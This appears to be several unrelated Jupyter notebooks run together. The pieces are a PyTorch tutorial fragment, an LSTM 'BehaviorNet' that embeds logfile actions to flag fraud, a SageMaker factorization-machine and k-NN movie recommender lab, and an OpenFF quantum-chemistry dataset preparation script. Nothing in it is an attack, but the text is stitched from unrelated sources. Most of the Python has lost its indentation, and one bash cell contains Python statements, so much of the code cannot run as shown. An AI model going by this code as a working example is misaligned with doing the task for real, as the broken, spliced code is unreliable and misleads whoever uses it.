fit(100, model, loss_fn, opt, train_dl)
# Generate predictions
preds = model(inputs)
preds
# Compare with targets
targets
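# Predict apples & oranges yield for a new region (temp=75, rainfall=63, humidity=44)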
model(torch.tensor([[75, 63, 44.]]))
```
```
import os
import numpy as np
import pandas as pd
import torch as t
from torch import nn
```
# BehaviorNet in PyTorch
Using a simple LSTM network to learn activity representations (an activity embedding analogous to a word embedding in a language model).
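As a toy illustration of the embedding idea (hypothetical action ids, not the notebook's data): each discrete action id is mapped to a small dense vector that the LSTM consumes, just like a word embedding in a language model.
```
import torch
from torch import nn

# 6 possible actions (id 0 reserved for padding), embedded into 3-dimensional vectors
embedding = nn.Embedding(num_embeddings=6, embedding_dim=3, padding_idx=0)
session = torch.LongTensor([[1, 4, 2, 0]])   # one padded session of action ids
vectors = embedding(session)                 # shape (1, 4, 3): one vector per action
```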
```
device = t.device('cpu')
```
## Load and prepare the artificial logfiles
```
%%bash
ls -lisa ./Data
logfile = pd.read_pickle('./Data/logfile.pkl')
id2action = np.load('./Data/id2action.npy')
action2id = {a : i for i,a in enumerate(id2action)}
logfile['SessionActivityInt'] = logfile.SessionActivity.map(lambda ls: np.array([action2id[a] for a in ls]+[action2id['start']]))
logfile.head()
```
## Network Design
```
class BehaviourNet(nn.Module):
'''
Very simple network consisting of an embedding layer, LSTM layers and a decoder with dropouts
'''
def __init__(self, n_actions=6, embedding_size=3, n_nodes=6, n_layers=2, dropout=0.2,
padding_idx=0, initrange=0.5):
        super(BehaviourNet, self).__init__()
self.dropout = nn.Dropout(dropout)
self.embedding = nn.Embedding(n_actions, embedding_size, padding_idx)
self.rnn = nn.LSTM(embedding_size, n_nodes, n_layers, dropout=dropout)
self.decoder = nn.Linear(n_nodes, n_actions)
self.init_weights(initrange)
self.n_nodes = n_nodes
self.n_layers = n_layers
def init_weights(self, initrange=0.1):
self.embedding.weight.data.uniform_(-initrange, initrange)
# Set the first row to zero (padding idx)
self.embedding.weight.data[0,:] = 0
print(self.embedding.weight)
self.decoder.bias.data.zero_()
self.decoder.weight.data.uniform_(-initrange, initrange)
def init_hidden(self, batch_size):
weight = next(self.parameters())
return (weight.new_zeros(self.n_layers, batch_size, self.n_nodes),
weight.new_zeros(self.n_layers, batch_size, self.n_nodes))
def forward(self, input, hidden):
emb = self.dropout(self.embedding(input))
output, hidden = self.rnn(emb, hidden)
output = self.dropout(output)
decoded = self.decoder(output.view(output.size(0)*output.size(1), output.size(2)))
return decoded.view(output.size(0), output.size(1), decoded.size(1)), hidden
def get_batch(i, batch_size, input):
'''
Takes a column/list of activity tensors of variable lenght
and returns the padded i-th minibatch of batch_size activities
'''
data = input[i*batch_size : (i+1) * batch_size]
data = sorted(data, key=len, reverse=True)
x = nn.utils.rnn.pad_sequence([x[:-1] for x in data])
y = nn.utils.rnn.pad_sequence([y[1:] for y in data])
return x, y
def split_train_test(input, device, prop=0.8, seed=42):
np.random.seed(42)
mask = np.random.uniform(size=input.shape[0])<=prop
train = input[mask]
test = input[~mask]
train = [t.LongTensor(a).to(device) for a in train]
test = [t.LongTensor(a).to(device) for a in test]
return train, test, input[mask].index, input[~mask].index
train, test, train_idx, test_idx = split_train_test(logfile.SessionActivityInt, device)
get_batch(0, 2, train)
def training(model, optimizer, scheduler, loss_function, data, batch_size, n_actions, clipping=0.5):
model.train()
n_batch = int(np.ceil(len(data) // batch_size))
hidden = model.init_hidden(batch_size)
scheduler.step()
total_loss = 0.0
for batch in range(n_batch):
hidden = tuple(h.detach() for h in hidden)
x,y = get_batch(batch, batch_size, data)
optimizer.zero_grad()
output, hidden = model(x, hidden)
output_flatten = output.view(-1, n_actions)
y_flatten = y.view(-1)
loss = loss_function(output_flatten, y_flatten)
loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), clipping)
optimizer.step()
total_loss += loss
return total_loss / n_batch
def evaluate(model, loss_function, data, n_actions):
model.eval()
batch_size = len(data)
hidden = model.init_hidden(batch_size)
x,y = get_batch(0, batch_size, data)
output, hidden = model(x, hidden)
output_flatten = output.view(-1, n_actions)
y_flatten = y.view(-1)
loss = loss_function(output_flatten, y_flatten)
    y_probs = nn.Softmax(dim=-1)(output)
y_predict = t.argmax(output, 2)
y_predict[y==0]=0
acc = (y_predict==y).double()[y>0].sum() / y[y>0].size(0)
return y_probs, y_predict, y, loss, acc
```
## Training
```
modelname = 'model_1'
model = BehaviourNet(initrange=10, n_layers=2, n_nodes=20, n_actions=len(id2action)).to(device)
loss_func = nn.CrossEntropyLoss(ignore_index=0)
optimizer = t.optim.RMSprop(model.parameters(), lr=0.05)
scheduler = t.optim.lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.5)
for epoch in range(20):
training_loss = training(model, optimizer, scheduler, loss_func, train, 100, n_actions=len(id2action))
y_prob, y_pred, y_true, test_loss, test_acc = evaluate(model, loss_func, test, n_actions=len(id2action))
print(f'Epoch {epoch}\nTrain Loss : {training_loss} \t Val loss: {test_loss} \t Val Acc {test_acc}')
```
## Save the model
```
try:
os.mkdir('./models')
except Exception as e:
print('Model dir already exists')
model_state_dict = model.state_dict()
optimizer_state_dict = optimizer.state_dict()
t.save({
'epoch': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': training_loss,
}, f'./models/{modelname}')
model_state_dict
```
## Use Embedding to detect anomalies
```
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
%matplotlib inline
embeddings = model.embedding.weight.data.cpu().numpy()
fig = plt.figure(figsize=(12,8))
ax = fig.add_subplot(111, projection='3d')
for i in range(1, len(action2id)):
ax.scatter(embeddings[i,0], embeddings[i,1], embeddings[i,2], s=25)
ax.text(embeddings[i,0]+0.2, embeddings[i,1]+0.2, embeddings[i,2], s=id2action[i], fontsize=14)
ax.grid(True)
ax.set_title('Action Embedding (latent space)')
plt.savefig('action_embeddings.png', dpi=500)
logfile['Embedded_Activities'] = logfile.SessionActivityInt.map(lambda x: embeddings[x].mean(axis=0))
logfile['Embedded_Activities_x'] = logfile.Embedded_Activities.map(lambda x: x[0])
logfile['Embedded_Activities_y'] = logfile.Embedded_Activities.map(lambda x: x[1])
logfile['Embedded_Activities_z'] = logfile.Embedded_Activities.map(lambda x: x[2])
fig = plt.figure(figsize=(16,8))
ax = fig.add_subplot(111, projection='3d')
plt.title('Activity profiles')
for i in range(1, len(action2id)):
ax.scatter(logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==0), 'Embedded_Activities_x'],
logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==0), 'Embedded_Activities_y'],
logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==0), 'Embedded_Activities_z'], color='green')
ax.scatter(logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==1), 'Embedded_Activities_x'],
logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==1), 'Embedded_Activities_y'],
logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==1), 'Embedded_Activities_z'], color='blue')
ax.scatter(logfile.loc[logfile.FraudulentActivity==1, 'Embedded_Activities_x'],
logfile.loc[logfile.FraudulentActivity==1, 'Embedded_Activities_y'],
logfile.loc[logfile.FraudulentActivity==1, 'Embedded_Activities_z'], color='red')
ax.grid(True)
plt.savefig('activityprofiles.png', dpi=500)
user_profiles = logfile.groupby(['UserID', 'UserRole', 'PotentialFraudster'], as_index=False).agg({
'Embedded_Activities_x':np.mean,
'Embedded_Activities_y':np.mean,
'Embedded_Activities_z':np.mean,
})
fig = plt.figure(figsize=(16,8))
ax = fig.add_subplot(111, projection='3d')
plt.title('User profiles')
for i in range(1, len(action2id)):
ax.scatter(user_profiles.loc[(user_profiles.UserRole==0) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_x'],
user_profiles.loc[(user_profiles.UserRole==0) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_y'],
user_profiles.loc[(user_profiles.UserRole==0) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_z'], color='green')
ax.scatter(user_profiles.loc[(user_profiles.UserRole==1) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_x'],
user_profiles.loc[(user_profiles.UserRole==1) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_y'],
user_profiles.loc[(user_profiles.UserRole==1) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_z'], color='blue')
ax.scatter(user_profiles.loc[user_profiles.PotentialFraudster==1, 'Embedded_Activities_x'],
user_profiles.loc[user_profiles.PotentialFraudster==1, 'Embedded_Activities_y'],
user_profiles.loc[user_profiles.PotentialFraudster==1, 'Embedded_Activities_z'], color='red')
ax.grid(True)
plt.savefig('userprofiles.png', dpi=500)
```
# Building a Recommender System with SageMaker Factorization Machines (FM)
*This notebook example explains how to build a recommender system with SageMaker Factorization Machines (FM), based on articles published on the AWS Machine Learning Blog.*
References
- [Build a movie recommender with factorization machines on Amazon SageMaker](https://aws.amazon.com/ko/blogs/machine-learning/build-a-movie-recommender-with-factorization-machines-on-amazon-sagemaker/)
- [Extending the Amazon SageMaker Factorization Machines algorithm to build a recommender system](https://aws.amazon.com/ko/blogs/korea/extending-amazon-sagemaker-factorization-machines-algorithm-to-predict-top-x-recommendations/)
- [Factorization Machines paper](https://www.csie.ntu.edu.tw/~b97053/paper/Rendle2010FM.pdf)
## 1. Factorization Machine
---
### Overview
Typical recommendation problems apply Matrix Factorization to a matrix whose rows are users, columns are items, and values are ratings, but it is hard to plug in the diverse metadata features found in real-world data. The Factorization Machine (FM) algorithm extends the idea of Matrix Factorization so that metadata features are considered as well, and it automatically models the interactions between features at linear computational complexity, which greatly reduces the feature-engineering effort.
### Description
To take the various metadata features into account, users and items are one-hot encoded as in the figure below and the additional features are simply concatenated, turning the problem into a linear regression of the form `f(user, item, additional features) = rating`.

However, a linear regression alone cannot capture interactions between features, so a term that models the pairwise feature interactions is added, turning the problem into a polynomial regression as in the equation below.
$$
\begin{align} \hat{y}(\mathbf{x}) = w_{0} + \sum_{i=1}^{d} w_{i} x_{i} + \sum_{i=1}^d \sum_{j=i+1}^d x_{i} x_{j} w_{ij}, \;\; x \in \mathbb{R}^d \tag {1}
\end{align}
$$
$d$ is the number of features, and $x \in \mathbb{R}^d$ is the feature vector of a single sample.
However, most recommender-system datasets are sparse, which leads to cold-start problems, and the computation becomes very expensive as more features are added. (For example, with 60,000 users, 5,000 items, and 5,000 additional features, a 70,000 x 70,000 interaction matrix would have to be estimated.)
FM addresses these problems with a matrix factorization trick: the interaction between each pair of features (e.g., user and item) is expressed as a dot product of latent vectors, and by rearranging the equation the computational complexity drops from $O(kd^2)$ to $O(kd)$. (A little extra algebra on equation (2) yields this linear complexity; see the paper for the details.)
$$
\begin{align}
\hat{y}(\mathbf{x}) = w_{0} + \sum_{i=1}^{d} w_i x_i + \sum_{i=1}^d\sum_{j=i+1}^d x_{i} x_{j} \langle\mathbf{v}_i, \mathbf{v}_j\rangle \tag{2}
\end{align}
$$
$$
\begin{align}
\langle \textbf{v}_i , \textbf{v}_{j} \rangle = \sum_{f=1}^k v_{i,f} v_{j,f},\; k: \text{dimension of latent feature} \tag{3}
\end{align}
$$
The model above is called a 2-way (degree = 2) FM; a generalized d-way FM also exists, but the 2-way version is what is normally used, and SageMaker's FM is a 2-way FM as well.
The parameter tuple learned by FM is ($w_{0}, \mathbf{w}, \mathbf{V}$), where
- $w_{0} \in \mathbb{R}$: global bias
- $\mathbf{w} \in \mathbb{R}^d$: the weights of the feature vector entries
- $\mathbf{V} \in \mathbb{R}^{d \times k}$: the feature embedding matrix whose i-th row is $\mathbf{v}_i$
As the equations show, FM has a closed form and linear time complexity, so it is well suited to recommendation problems with many users, items, and metadata features.
Representative training methods are Gradient Descent, ALS (Alternating Least Squares), and MCMC (Markov Chain Monte Carlo); AWS trains the Gradient Descent variant on a deep-learning architecture using the MXNet framework.
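To make equation (2) concrete, here is a minimal NumPy sketch of a 2-way FM prediction using the linear-time rearrangement from the paper; the variable names are illustrative and unrelated to the SageMaker implementation.
```
import numpy as np

def fm_predict(x, w0, w, V):
    """x: (d,) feature vector, w0: scalar bias, w: (d,) linear weights, V: (d, k) latent factors."""
    linear = w0 + w @ x
    # Pairwise interactions in O(kd):
    # sum_{i<j} <v_i, v_j> x_i x_j = 0.5 * sum_f [ (sum_i V[i,f] x_i)^2 - sum_i V[i,f]^2 x_i^2 ]
    interactions = 0.5 * np.sum((V.T @ x) ** 2 - (V.T ** 2) @ (x ** 2))
    return float(linear + interactions)
```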
## 2. Training and Deploying an FM Model with the MovieLens Dataset
---
If MNIST is the Hello World of deep learning, MovieLens is the Hello World of recommender systems.
The dataset comes in several sizes; this example uses ml-100k, which contains 100,000 ratings from 943 users on 1,682 movies.
```
import sagemaker
import sagemaker.amazon.common as smac
from sagemaker import get_execution_role
from sagemaker.predictor import json_deserializer
from sagemaker.amazon.amazon_estimator import get_image_uri
import numpy as np
from scipy.sparse import lil_matrix
import pandas as pd
import boto3, io, os, csv, json
```
### Download the MovieLens dataset
```
!wget http://files.grouplens.org/datasets/movielens/ml-100k.zip
!unzip -o ml-100k.zip
```
### Shuffle the data
```
!shuf ml-100k/ua.base -o ml-100k/ua.base.shuffled
```
### Load the training data
```
user_movie_ratings_train = pd.read_csv('ml-100k/ua.base.shuffled', sep='\t', index_col=False,
names=['user_id' , 'movie_id' , 'rating'])
user_movie_ratings_train.head(5)
```
### Load the test data
```
user_movie_ratings_test = pd.read_csv('ml-100k/ua.test', sep='\t', index_col=False,
names=['user_id' , 'movie_id' , 'rating'])
user_movie_ratings_test.head(5)
```
You may wonder why 100,000 ratings still counts as sparse: across all 943 users and 1,682 movies there are 943 * 1,682 = 1,586,126 possible ratings, of which only about 6.3% are observed.
```
nb_users = user_movie_ratings_train['user_id'].max()
nb_movies = user_movie_ratings_train['movie_id'].max()
nb_features = nb_users + nb_movies
total_ratings = nb_users * nb_movies
nb_ratings_test = len(user_movie_ratings_test.index)
nb_ratings_train = len(user_movie_ratings_train.index)
print("# of users: {}".format(nb_users))
print("# of movies: {}".format(nb_movies))
print("Training Count: {}".format(nb_ratings_train))
print("Test Count: {}".format(nb_ratings_test))
print("Features (# of users + # of movies): {}".format(nb_features))
print("Sparsity: {}%".format(((nb_ratings_test+nb_ratings_train)/total_ratings)*100))
```
### Convert to one-hot encoded sparse matrices
We now convert the data into the one-hot encoded sparse matrix format that FM expects as input. Dense matrices also work, but they become slow as the data grows, so sparse matrices are recommended.
Note that the MovieLens dataset has no extra metadata features, so only the 943 users and 1,682 movies are one-hot encoded, giving a feature dimension of 943 + 1,682 = 2,625 after the transformation.
Also, this example simplifies the task to a binary classification of whether a movie is rated 4 or higher (i.e., $y = 1$ if the rating is 4 or above and $y = 0$ otherwise).
The cell below takes about 20 seconds; after conversion, each dataset has shape (number of ratings) x (number of features).
```
%%time
def loadDataset(df, lines, columns):
    # Convert the features into a one-hot encoded sparse matrix
X = lil_matrix((lines, columns)).astype('float32')
Y = []
line = 0
for line, (index, row) in enumerate(df.iterrows()):
X[line,row['user_id']-1] = 1
X[line, nb_users+(row['movie_id']-1)] = 1
if int(row['rating']) >= 4:
Y.append(1)
else:
Y.append(0)
Y = np.array(Y).astype('float32')
return X,Y
X_train, Y_train = loadDataset(user_movie_ratings_train, nb_ratings_train, nb_features)
X_test, Y_test = loadDataset(user_movie_ratings_test, nb_ratings_test, nb_features)
print(X_train.shape)
print(Y_train.shape)
assert X_train.shape == (nb_ratings_train, nb_features)
assert Y_train.shape == (nb_ratings_train, )
one_labels = np.count_nonzero(Y_train)
print("Training labels: {} zeros, {} ones".format(nb_ratings_train-one_labels, one_labels))
print(X_test.shape)
print(Y_test.shape)
assert X_test.shape == (nb_ratings_test, nb_features)
assert Y_test.shape == (nb_ratings_test, )
one_labels = np.count_nonzero(Y_test)
print("Test labels: {} zeros, {} ones".format(nb_ratings_test-one_labels, one_labels))
```
### Convert to protobuf format and save to S3
```
import sagemaker
bucket = sagemaker.Session().default_bucket()
#bucket = '[YOUR-BUCKET]'
prefix = 'fm-hol'
if bucket.strip() == '':
raise RuntimeError("bucket name is empty.")
train_key = 'train.protobuf'
train_prefix = '{}/{}'.format(prefix, 'train')
test_key = 'test.protobuf'
test_prefix = '{}/{}'.format(prefix, 'test')
output_prefix = 's3://{}/{}/output'.format(bucket, prefix)
```
The cell below takes about 15 seconds.
```
%%time
def writeDatasetToProtobuf(X, bucket, prefix, key, d_type, Y=None):
buf = io.BytesIO()
if d_type == "sparse":
smac.write_spmatrix_to_sparse_tensor(buf, X, labels=Y)
else:
smac.write_numpy_to_dense_tensor(buf, X, labels=Y)
buf.seek(0)
obj = '{}/{}'.format(prefix, key)
boto3.resource('s3').Bucket(bucket).Object(obj).upload_fileobj(buf)
return 's3://{}/{}'.format(bucket,obj)
fm_train_data_path = writeDatasetToProtobuf(X_train, bucket, train_prefix, train_key, "sparse", Y_train)
fm_test_data_path = writeDatasetToProtobuf(X_test, bucket, test_prefix, test_key, "sparse", Y_test)
print("Training data S3 path: ", fm_train_data_path)
print("Test data S3 path: ", fm_test_data_path)
print("FM model output S3 path: ", output_prefix)
```
### Training
This hands-on uses heuristic hyperparameters without any hyperparameter tuning.
- `feature_dim`: the number of features; for this hands-on it must be set to 2,625.
- `mini_batch_size`: set to 1,000 here.
- `num_factors`: the latent factor dimension; set to 64 here.
- `epochs`: set to 100 here.
```
instance_type_training = 'ml.c4.xlarge'
fm = sagemaker.estimator.Estimator(get_image_uri(boto3.Session().region_name, "factorization-machines"),
get_execution_role(),
train_instance_count=1,
train_instance_type=instance_type_training,
output_path=output_prefix,
sagemaker_session=sagemaker.Session())
fm.set_hyperparameters(feature_dim=nb_features,
predictor_type='binary_classifier',
mini_batch_size=1000,
num_factors=64,
epochs=100)
```
Everything is now ready for training; all you need to do is call the `fit()` method. <br>
Training takes about 4-5 minutes (the training itself is much shorter, but provisioning the training instance takes a fixed amount of time). The accuracy on the validation set is about 70% and the F1 score is about 0.73-0.74 (see the output messages below).
```
[03/12/2020 09:35:42 INFO 139967441712960] #test_score (algo-1) : ('binary_classification_accuracy', 0.6928950159066808)
[03/12/2020 09:35:42 INFO 139967441712960] #test_score (algo-1) : ('binary_classification_cross_entropy', 0.5799107152103493)
[03/12/2020 09:35:42 INFO 139967441712960] #test_score (algo-1) : ('binary_f_1.000', 0.7331859222406486)
```
```
%%time
fm.fit({'train': fm_train_data_path, 'test': fm_test_data_path})
```
### Deployment
Deployment is just as simple: call the `deploy()` method. It takes about 5-10 minutes.
```
%%time
instance_type_inference = 'ml.m5.large'
fm_predictor = fm.deploy(instance_type=instance_type_inference, initial_instance_count=1)
def fm_serializer(data):
js = {'instances': []}
for row in data:
js['instances'].append({'features': row.tolist()})
#print js
return json.dumps(js)
fm_predictor.content_type = 'application/json'
fm_predictor.serializer = fm_serializer
fm_predictor.deserializer = json_deserializer
result = fm_predictor.predict(X_test[1000:1010].toarray())
print(result)
print (Y_test[1000:1010])
```
#### That covers the basic usage, and you may stop the lab here. If you finished early or want to dig deeper, run the cells below in order. ####
#### [Caution] If you do not need to keep the endpoint running for real-time predictions, delete the endpoint to avoid unnecessary charges. ####
<br>
## 3. (Optional) Using the FM Model Parameters to Train and Deploy a k-NN Model for Top-k Recommendations
---
Now that the model has been created and stored in SageMaker, we can download that same FM model and repackage it for a k-NN model.
### Download the model artifact
```
#!pip install mxnet # Uncomment to install mxnet if needed
import mxnet as mx
model_file_name = "model.tar.gz"
model_full_path = fm.output_path + "/" + fm.latest_training_job.job_name + "/output/" + model_file_name
print("Model Path: ", model_full_path)
# Download the FM model artifact (model.tar.gz)
os.system("aws s3 cp " + model_full_path+ " .")
# Extract the model artifact
os.system("tar xzvf " + model_file_name)
os.system("unzip -o model_algo-1")
os.system("mv symbol.json model-symbol.json")
os.system("mv params model-0000.params")
```
### Extract the model parameters
We retrieve the parameter tuple ($w_{0}, \mathbf{w}, \mathbf{V}$) trained by FM.
```
# Load the trained FM model
m = mx.module.Module.load('./model', 0, False, label_names=['out_label'])
V = m._arg_params['v'].asnumpy() # 2625 x 64
w = m._arg_params['w1_weight'].asnumpy() # 2625 x1
b = m._arg_params['w0_weight'].asnumpy() # 1
print(V.shape, w.shape, b.shape)
```
### Repackage the dataset
We now repackage the model parameters extracted from the FM model to prepare for training a k-NN model. This process creates two datasets:
- Item latent matrix: used to train the k-NN model; $a_i = concat(V, \; w)$
- User latent matrix: used at inference time; $a_u = concat(V, \; 1)$
Note that this hands-on code only covers the scenario where we have user and item IDs. Real data, however, may contain additional metadata (e.g., age, zip code, and gender for users; genre and main keywords for movies). In that case the user and item vectors can be extracted as follows:
- Encode each item and its features as $x_i$, then project onto $\mathbf{V}$ and $\mathbf{w}$: $a_i = concat(V^T \cdot x_i , \; w^T \cdot x_i)$
- Encode each user and its features as $x_u$, then project onto $\mathbf{V}$: $a_u = concat(V^T \cdot x_u, \; 1)$
Train the k-NN model with $a_i$ and run inference with $a_u$.
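As a purely illustrative sketch of the metadata-aware case just described (here `x_item` and `x_user` stand for one-hot-plus-metadata encodings, and `V`, `w` are the arrays extracted above; these names are assumptions, not part of the lab):
```
# Illustrative only -- not needed for the ID-only MovieLens case handled in the next cell.
# x_item, x_user: (d,) encodings of an item / a user together with their metadata features.
a_i = np.concatenate([V.T @ x_item, w.T @ x_item])  # item vector used for k-NN training
a_u = np.concatenate([V.T @ x_user, [1.0]])         # user vector used at inference time
```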
```
# item latent matrix - concat(V[i], w[i]).
knn_item_matrix = np.concatenate((V[nb_users:], w[nb_users:]), axis=1) # 1682 x 65
knn_train_label = np.arange(1,nb_movies+1) # [1, 2, 3, ..., 1681, 1682]
# user latent matrix - concat (V[u], 1)
ones = np.ones(nb_users).reshape((nb_users, 1)) # 943x1
knn_user_matrix = np.concatenate((V[:nb_users], ones), axis=1) # 943 x 65
```
### Train the k-NN model
The k-NN model uses the default index_type (faiss.Flat). This can become slow on large datasets, in which case a different index_type parameter can be used for faster training. See the k-NN documentation for details on index types.
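For very large item matrices one might, for example, switch to an approximate index when setting the hyperparameters in the next cell. The sketch below is illustrative only; double-check the supported `index_type` values against the SageMaker k-NN documentation.
```
# Illustrative alternative to the defaults used below (assumes the `knn` estimator
# created in the next cell); an IVF-style index trades a little accuracy for speed.
knn.set_hyperparameters(feature_dim=knn_item_matrix.shape[1], k=nb_recommendations,
                        index_metric="INNER_PRODUCT", index_type="faiss.IVFFlat",
                        predictor_type='classifier', sample_size=200000)
```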
```
print('KNN train features shape = ', knn_item_matrix.shape)
knn_prefix = 'knn'
knn_output_prefix = 's3://{}/{}/output'.format(bucket, knn_prefix)
knn_train_data_path = writeDatasetToProtobuf(knn_item_matrix, bucket, knn_prefix, train_key, "dense", knn_train_label)
print('Uploaded KNN train data: {}'.format(knn_train_data_path))
nb_recommendations = 100
knn = sagemaker.estimator.Estimator(get_image_uri(boto3.Session().region_name, "knn"),
get_execution_role(),
train_instance_count=1,
train_instance_type=instance_type_training,
output_path=knn_output_prefix,
sagemaker_session=sagemaker.Session())
knn.set_hyperparameters(feature_dim=knn_item_matrix.shape[1], k=nb_recommendations,
index_metric="INNER_PRODUCT", predictor_type='classifier', sample_size=200000)
fit_input = {'train': knn_train_data_path}
```
Start the training. The cell below takes about 4-5 minutes to run.
```
%%time
knn.fit(fit_input)
knn_model_name = knn.latest_training_job.job_name
print("Created model: ", knn_model_name)
```
Create a SageMaker model so that it can be referenced for batch inference.
```
# Save the model so it can be referenced during batch inference in the next step
sm = boto3.client(service_name='sagemaker')
primary_container = {
'Image': knn.image_name,
'ModelDataUrl': knn.model_data,
}
knn_model = sm.create_model(
ModelName = knn.latest_training_job.job_name,
ExecutionRoleArn = knn.role,
PrimaryContainer = primary_container)
```
### Batch Transform
With Amazon SageMaker's Batch Transform feature, you can generate batch inference results at scale. <br>
The cell below takes about 4 minutes to complete.
```
%%time
# Upload the inference data to S3
knn_batch_data_path = writeDatasetToProtobuf(knn_user_matrix, bucket, knn_prefix, train_key, "dense")
print("Batch inference data path: ", knn_batch_data_path)
# Initialize the Transformer object
transformer = sagemaker.transformer.Transformer(
base_transform_job_name="knn",
model_name=knn_model_name,
instance_count=1,
instance_type=instance_type_inference,
output_path=knn_output_prefix,
accept="application/jsonlines; verbose=true"
)
# Start the transform job
transformer.transform(knn_batch_data_path, content_type='application/x-recordio-protobuf')
transformer.wait()
# Download the output file from S3
results_file_name = "inference_output"
inference_output_file = "knn/output/train.protobuf.out"
s3_client = boto3.client('s3')
s3_client.download_file(bucket, inference_output_file, results_file_name)
with open(results_file_name) as f:
results = f.readlines()
```
### Top-k inference example
Let's look at the recommended movies for user 90 in the batch inference results. In the resulting data frame, the first column is the movie id, the second the movie title, and the third the similarity score (distance).
```
def get_movie_title(movie_id):
movie_id = int(movie_id)
return items.iloc[movie_id]['TITLE']
import json
test_user_idx = 89 # indices start at 0, so user 90 corresponds to index 89
u_one_json = json.loads(results[test_user_idx])
items = pd.read_csv('./ml-100k/u.item', sep='|', usecols=[0,1], encoding='latin-1', names=['ITEM_ID', 'TITLE'], index_col='ITEM_ID')
movie_id_list = [int(movie_id) for movie_id in u_one_json['labels']]
movie_dist_list = [round(distance, 4) for distance in u_one_json['distances']]
movie_title_list = [get_movie_title(movie_id) for movie_id in movie_id_list]
recommend_df = pd.DataFrame({'movie_id': movie_id_list,
'movie_title': movie_title_list,
'movie_dist': movie_dist_list})
print("Recommendations for user: ", test_user_idx)
recommend_df.head(30)
```
```
import logging
import warnings
from pprint import pprint
import numpy as np
from openeye import oechem
from openff.qcsubmit.common_structures import QCSpec, PCMSettings
from openff.qcsubmit.factories import OptimizationDatasetFactory
from openff.qcsubmit.workflow_components import StandardConformerGenerator
from openff.toolkit.topology import Molecule
from qcelemental.models.results import WavefunctionProtocolEnum
from tqdm import tqdm
from openff.toolkit.utils import GLOBAL_TOOLKIT_REGISTRY, OpenEyeToolkitWrapper
GLOBAL_TOOLKIT_REGISTRY.deregister_toolkit(OpenEyeToolkitWrapper)
# Warnings that tell us we have undefined stereo and charged molecules
logging.getLogger("openff.toolkit").setLevel(logging.ERROR)
warnings.simplefilter("ignore")
```
# Dataset Preparation
Load in the SMILES patterns of the molecules to include:
```
with open("molecules.smi") as file:
smiles_patterns = file.read().split("\n")
smiles_patterns = [pattern for pattern in smiles_patterns if len(pattern) > 0]
```
Load in the molecules to be optimized:
```
molecules = [
Molecule.from_smiles(s)
for s in tqdm(smiles_patterns)
]
print(len(molecules))
```
Prepare the main dataset from the molecule list.
```
# Required due to occasional SCF failures. See the V1 dataset as well as
# http://forum.psicode.org/t/dft-scf-not-converging/1725/3
# dft_ultra_fine_keywords = dict(
# dft_spherical_points=590,
# dft_radial_points=99,
# dft_pruning_scheme="robust"
# )
external_field = {
"X-": [-0.01, 0.0, 0.0],
"X+": [0.01, 0.0, 0.0],
"Y-": [0.0, -0.01, 0.0],
"Y+": [0.0, 0.01, 0.0],
"Z-": [0.0, 0.0, -0.01],
"Z+": [0.0, 0.0, 0.01],
}
qc_specifications = {}
for key, value in external_field.items():
qc_specifications[f"MP2/aug-cc-pVTZ/{key}"] = QCSpec(
method="MP2",
basis="aug-cc-pVTZ",
spec_name=f"MP2/aug-cc-pVTZ/{key}",
spec_description=(
"The quantum chemistry specification used to generate data for typed polarizabilities training."
),
keywords= {
"scf_type": "df",
"mp2_type": "df",
"E_CONVERGENCE": "1.0e-8",
"PERTURB_H": True,
"PERTURB_WITH": "DIPOLE",
"PERTURB_DIPOLE": value, # ["X-", "X+", "Y-", "Y+", "Z-", "Z+"]
},
store_wavefunction=WavefunctionProtocolEnum.orbitals_and_eigenvalues
)
qc_specifications["MP2/aug-cc-pVTZ"] = QCSpec(
method="MP2",
basis="aug-cc-pVTZ",
spec_name="MP2/aug-cc-pVTZ",
spec_description=(
"The quantum chemistry specification used to generate data for typed polarizabilities training."
),
store_wavefunction=WavefunctionProtocolEnum.orbitals_and_eigenvalues
)
dataset_factory = OptimizationDatasetFactory(
qc_specifications=qc_specifications
)
dataset_factory.add_workflow_components(
StandardConformerGenerator(max_conformers=5, rms_cutoff=0.1, clear_existing=True)
)
dataset = dataset_factory.create_dataset(
dataset_name="OpenFF RESP Polarizability Optimizations v1.1",
tagline="Optimizations of ESP-fitting based direct polarizabilities.",
description="A data set used for training typed polarizabilities using direct polarization.\n"
"This data set only includes element C, H, N, and O.",
molecules=molecules,
)
dataset.metadata.submitter = "willawang"
dataset.metadata.long_description_url = (
"https://github.com/openforcefield/qca-dataset-submission/tree/master/"
"submissions/"
"2021-10-01-OpenFF-resppol-mp2-single-point"
)
# dataset.provenance["constructure"] = "0.0.1"
```
Make sure the molecules in the dataset match the input molecules
```
old_smiles = {Molecule.from_smiles(smiles).to_smiles(isomeric=False) for smiles in smiles_patterns}
new_smiles = {molecule.to_smiles(isomeric=False) for molecule in dataset.molecules}
assert len(old_smiles.symmetric_difference(new_smiles)) == 0
confs = np.array([len(mol.conformers) for mol in dataset.molecules])
print("Number of unique molecules ", dataset.n_molecules)
print("Number of filtered molecules ", dataset.n_filtered)
print("Number of conformers ", dataset.n_records)
print("Number of conformers min mean max",
confs.min(), "{:6.2f}".format(confs.mean()), confs.max())
masses = []
for molecule in dataset.molecules:
oemol = molecule.to_openeye()
mass = oechem.OECalculateMolecularWeight(oemol)
masses.append(mass)
print(f'Mean molecular weight: {np.mean(np.array(masses)):.2f}')
print(f'Max molecular weight: {np.max(np.array(masses)):.2f}')
print("Charges:", sorted(set(m.total_charge/m.total_charge.unit for m in dataset.molecules)))
```
Describe the dataset
```
pprint(dataset.metadata.dict())
for spec, obj in dataset.qc_specifications.items():
print("Spec:", spec)
pprint(obj.dict())
```
Export the dataset.
```
dataset.export_dataset("dataset-v1.1.json.bz2")
